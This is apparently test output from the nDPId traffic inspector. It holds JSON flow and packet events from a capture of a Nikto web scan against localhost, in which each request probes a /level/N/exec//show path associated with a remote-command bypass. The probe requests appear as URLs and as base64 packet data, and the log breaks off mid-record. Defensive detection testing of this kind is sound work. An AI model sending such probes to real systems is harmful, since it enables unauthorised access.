{"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1576420277642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277642,"pkt":"AAAAAAAAAAAAAAAACABFAADIuMhAAEAGg2V\/AAABfwAAAcZIH5DuPYHFtiFXooAYAED+vAAAAQEICp1m\/rKdZv6yR0VUIC9sZXZlbC81MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1576420277644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277644,"pkt":"AAAAAAAAAAAAAAAACABFAADIp2FAAEAGlMx\/AAABfwAAAcZKH5BZVp5d6Tz88YAYAED+vAAAAQEICp1m\/rSdZv60R0VUIC9sZXZlbC81Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1576420277646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277646,"pkt":"AAAAAAAAAAAAAAAACABFAADIRMlAAEAG92R\/AAABfwAAAcZMH5Ck2n3FkPG1\/IAYAED+vAAAAQEICp1m\/radZv62R0VUIC9sZXZlbC81My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1576420277648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277648,"pkt":"AAAAAAAAAAAAAAAACABFAADIfG5AAEAGv79\/AAABfwAAAcZOH5Bk90VplsnARIAYAED+vAAAAQEICp1m\/ridZv64R0VUIC9sZXZlbC81NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1576420277650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277650,"pkt":"AAAAAAAAAAAAAAAACABFAADIGk5AAEAGIeB\/AAABfwAAAcZQH5A3JSNJK84\/noAYAED+vAAAAQEICp1m\/rmdZv65R0VUIC9sZXZlbC81NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1576420277657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277657,"pkt":"AAAAAAAAAAAAAAAACABFAADIqGlAAEAGk8R\/AAABfwAAAcZSH5BRNZFiv2NJXIAYAED+vAAAAQEICp1m\/sGdZv7AR0VUIC9sZXZlbC81Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1576420277658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277658,"pkt":"AAAAAAAAAAAAAAAACABFAADIKidAAEAGEgd\/AAABfwAAAcZUH5DRhBMk1ziDVIAYAED+vAAAAQEICp1m\/sKdZv7CR0VUIC9sZXZlbC81Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDQpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1576420277660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277660,"pkt":"AAAAAAAAAAAAAAAACABFAADI7vpAAEAGTTN\/AAABfwAAAcZWH5Ba4NgASBBLBYAYAED+vAAAAQEICp1m\/sSdZv7ER0VUIC9sZXZlbC81OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1576420277662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277662,"pkt":"AAAAAAAAAAAAAAAACABFAADIlWJAAEAGpst\/AAABfwAAAcZYH5ApQaxoF8oWWYAYAED+vAAAAQEICp1m\/sadZv7GR0VUIC9sZXZlbC81OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1576420277663,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277663,"pkt":"AAAAAAAAAAAAAAAACABFAADIGkpAAEAGIeR\/AAABfwAAAcZaH5C0PSNBlakojYAYAED+vAAAAQEICp1m\/sedZv7HR0VUIC9sZXZlbC82MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1576420277667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277667,"pkt":"AAAAAAAAAAAAAAAACABFAADIoR1AAEAGmxB\/AAABfwAAAcZcH5BUypgTdH6XP4AYAED+vAAAAQEICp1m\/sudZv7LR0VUIC9sZXZlbC82MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 